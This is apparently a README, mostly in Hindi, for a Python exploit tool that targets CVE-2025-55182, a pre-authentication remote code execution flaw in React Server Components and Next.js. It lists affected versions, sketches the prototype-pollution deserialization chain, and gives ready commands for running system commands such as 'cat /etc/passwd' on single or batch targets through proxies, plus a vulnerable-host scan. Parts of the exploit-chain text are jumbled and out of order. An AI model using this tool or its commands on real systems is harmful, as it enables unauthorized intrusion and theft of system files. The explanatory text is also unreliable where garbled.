
React Server Components / Next.js प्री-ऑथेंटिकेशन रिमोट कोड निष्पादन
| गुण | मान |
|---|---|
| CVE ID | CVE-2025-55182 |
| CVSS | 10.0 (Critical) |
| CWE | CWE-502: Deserialization of Untrusted Data |
| प्रकार | Pre-Auth RCE |
| घटक | प्रभावित संस्करण |
|---|---|
| React | 19.0.0, 19.1.0, 19.1.1, 19.2.0 |
| Next.js | 15.0.0 ~ 15.0.4, 15.1.0 ~ 15.1.8, 15.2.x ~ 15.5.6, 16.0.0 ~ 16.0.6 |
| संबंधित पैकेज | react-server-dom-webpack, react-server-dom-turbopack, react-server-dom-parcel |
यह भेद्यता React Server Components (RSC) Flight प्रोटोकॉल में डिसीरियलाइज़ेशन दोष का शोषण करती है, और दुर्भावनापूर्ण multipart/form-data अनुरोध बनाकर अनधिकृत रिमोट कोड निष्पादन प्राप्त करती है। पूर्ण शोषण श्रृंखला निम्नलिखित है:
Next-Action अनुरोध हेडर के साथ POST multipart/form-data का उपयोग करके Server Action पथ ट्रिगर करें$1:__proto__:then PENDING स्थिति वाले Chunk 1 ऑब्जेक्ट पर Chunk.prototype.then तक पहुंचता है, जिससे यह thenable बन जाता है$1:constructor:constructor प्रोटोटाइप श्रृंखला के माध्यम से Function कंस्ट्रक्टर के रूप में हल होता हैChunk.prototype.then initializeModelChunk को कॉल करके value फ़ील्ड '{"then":"$B0"}' को पार्स करता है$B0 ब्लॉब पार्सिंग _formData.get(_prefix + "0") को कॉल करता है, अर्थात Function(code + "0")pip install requests[socks]
स्क्रिप्ट जब निर्भरताएँ गायब होती हैं, तो स्वचालित रूप से
requestsऔरPySocksस्थापित करने का प्रयास करती है।
python CVE-2025-55182.py -u http://target:3000 -c "id"
python CVE-2025-55182.py -f targets.txt -c "cat /etc/passwd" -o results.txt
python CVE-2025-55182.py -u http://target:3000 --check
python CVE-2025-55182.py -f targets.txt --check -o vuln_hosts.txt
# HTTP 代理
python CVE-2025-55182.py -u http://target:3000 -c "whoami" --proxy http://127.0.0.1:8080
# SOCKS5 代理
python CVE-2025-55182.py -f targets.txt -c "id" --proxy socks5://127.0.0.1:1080
python CVE-2025-55182.py -u http://target:3000 -c "id" -v
बैच स्कैन परिणाम -o द्वारा निर्दिष्ट आउटपुट फ़ाइल में लिखे जाएंगे, और केवल पुष्टिकृत भेद्यता वाले लक्ष्य दर्ज किए जाएंगे।
http://192.168.1.10:3000
https://app.example.com
http://10.0.0.5:3000/dashboard
# 注释行会被忽略
यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और सुरक्षा अनुसंधान उद्देश्यों के लिए है। उपयोगकर्ता को यह सुनिश्चित करना होगा कि उन्होंने लक्ष्य सिस्टम के स्वामी से स्पष्ट प्राधिकरण प्राप्त कर लिया है। बिना प्राधिकरण के सिस्टम पर पेनेट्रेशन परीक्षण करना अवैध है, और उपयोगकर्ता को सभी कानूनी जिम्मेदारी स्वयं वहन करनी होगी।
then गुण रखता है, इसे thenable माना जाता है और कॉल किया जाता है, जिससे कोड निष्पादन ट्रिगर होता है और RCE प्राप्त होता है| पैरामीटर | विवरण | डिफ़ॉल्ट मान |
|---|
-u, --url | एकल लक्ष्य URL (-f के साथ परस्पर अनन्य) | - |
-f, --file | लक्ष्य URL सूची फ़ाइल, प्रत्येक पंक्ति में एक (-u के साथ परस्पर अनन्य) | - |
-c, --command | निष्पादित की जाने वाली सिस्टम कमांड (--check मोड में आवश्यक नहीं) | - |
-o, --output | परिणाम आउटपुट फ़ाइल | results.txt |
-t, --threads | समवर्ती थ्रेड संख्या | 10 |
-v, --verbose | डिबग आउटपुट दिखाएं | False |
--proxy | प्रॉक्सी पता, HTTP और SOCKS5 समर्थित | - |
--timeout | अनुरोध टाइमआउट (सेकंड) | 15 |
--check | केवल भेद्यता का पता लगाएं, सिस्टम कमांड निष्पादित न करें | False |
--verify-ssl | TLS प्रमाणपत्र सत्यापित करें | False |